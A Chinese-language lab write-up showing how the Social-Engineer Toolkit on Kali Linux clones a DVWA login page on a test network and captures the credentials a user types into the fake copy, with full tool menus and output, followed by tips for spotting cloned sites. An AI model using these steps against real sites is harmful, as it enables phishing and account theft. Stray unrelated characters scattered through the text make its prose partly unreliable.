0x00 測試拓撲

0x01 社工思路

Kali linux通過將DVWA的網(wǎng)站（http://10.121.10.173/DVWA/login.php）進行克隆轩勘，然后將克隆后的網(wǎng)站地址（即http://10.121.10.170）發(fā)給用戶，用戶未仔細校對分辯網(wǎng)址的情況下在克隆后的網(wǎng)站地址10.121.10.170中輸入原本要登錄DVWA系統(tǒng)的登錄名和密碼，導(dǎo)致這些信息被記錄下來默辨。

0x02 社工步驟

【Step1】

root@kali:~# setoolkit 啟動社工工具

[-] New set.config.py file generated on: 2017-08-06 16:03:13.878092
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2017-08-06 16:03:13.878092
[*] SET is using the new config, no need to restart
Select from the menu:
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

【Step2】

set> 1 選擇1挎狸，Social-Engineering Attacks社會工程攻擊

Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules
  99) Return back to the main menu.

【Step3】

set> 2 選擇2寺擂，Website Attack Vectors網(wǎng)站攻擊

The Web Attack module is  a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method
  99) Return to Main Menu

【Step4】

set:webattack>3 選擇3，Credential Harvester Attack Method憑據(jù)收集攻擊

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

【Step5】

set:webattack>2 選擇2劣针，Site Cloner網(wǎng)站克隆

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this

【Step6】

set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.121.10.170 輸入本地監(jiān)聽地址（即網(wǎng)站被克隆到這個IP的主機上）

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

【Step7】

set:webattack> Enter the url to clone:http://10.121.10.173/DVWA/login.php 輸入要克隆的網(wǎng)站

[*] Cloning the website: http://10.121.10.173/DVWA/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y
[ ok ] Starting apache2 (via systemctl): apache2.service.
Apache webserver is set to ON. Copying over PHP file to the website.

【Step8】

在其他PC機上訪問http://10.121.10.170時，出現(xiàn)如下界面亿扁，該界面就是從10.121.10.173網(wǎng)站上克隆過來的DVWA登錄界面捺典。然后輸入用戶名密碼。

在此頁面上輸入用戶名密碼后从祝，頁面立即跳轉(zhuǎn)至http://10.121.10.173/DVWA/login.php（即正常DVWA網(wǎng)站的登錄頁面）襟己。如下圖所示。

【Step9】

查看kali linux的社工攻擊工具中記錄了用戶輸入的用戶名和密碼哄褒，表面網(wǎng)站克隆后稀蟋，用戶憑據(jù)被成功收集。如下所示呐赡。

Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www/html directory
[*] All files have been copied to /var/www/html
[*] SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.
[*] All files are located under the Apache web root directory: /var/www/html
[*] All fields captures will be displayed below.
[Credential Harvester is now listening below...]

('Array\n',)
('(\n',)
('    [username] => admin\n',)   **用戶輸入的用戶名admin被成功記錄**
('    [password] => p@ssw0rd\n',)  **用戶輸入的密碼p@ssw0rd被成功記錄**
('    [Login] => Login\n',)
('    [user_token] => 8e0b355e4bbf86a78ac1d5dee2f6f396\n',)
(')\n',)

0x03 網(wǎng)站克隆憑據(jù)收集攻擊識別及防護

• 在登錄時退客，輸入完用戶名和密碼后點擊登錄，發(fā)現(xiàn)頁面未進行跳轉(zhuǎn)链嘀，再一次的需要輸入用戶名和密碼且無任何報錯萌狂，這時就很有可能信息被收集了。

• 銀行怀泊、金融等涉及財務(wù)的單位部門不會主動給用戶發(fā)送鏈接網(wǎng)址茫藏，因此在收到此類的網(wǎng)址后，千萬不要隨意登錄輸入信息霹琼，請務(wù)必跟相關(guān)單位確認务傲。

• 登錄涉及金融凉当、個人信息等網(wǎng)站，建議第1次輸入時售葡，故意輸錯用戶名和密碼看杭。一般網(wǎng)站克隆后只收集1次信息，收集完后會立馬跳轉(zhuǎn)至正常的登錄界面挟伙。

• 學(xué)會辨識常用的銀行楼雹、金融網(wǎng)址。